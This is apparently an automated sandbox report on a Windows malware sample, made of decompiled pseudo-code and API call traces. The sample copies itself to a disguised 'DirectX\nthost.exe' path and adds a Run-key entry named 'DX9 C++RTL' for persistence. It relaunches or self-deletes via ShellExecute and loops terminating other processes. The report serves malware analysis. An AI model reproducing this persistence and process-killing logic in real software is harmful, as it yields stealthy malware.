    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
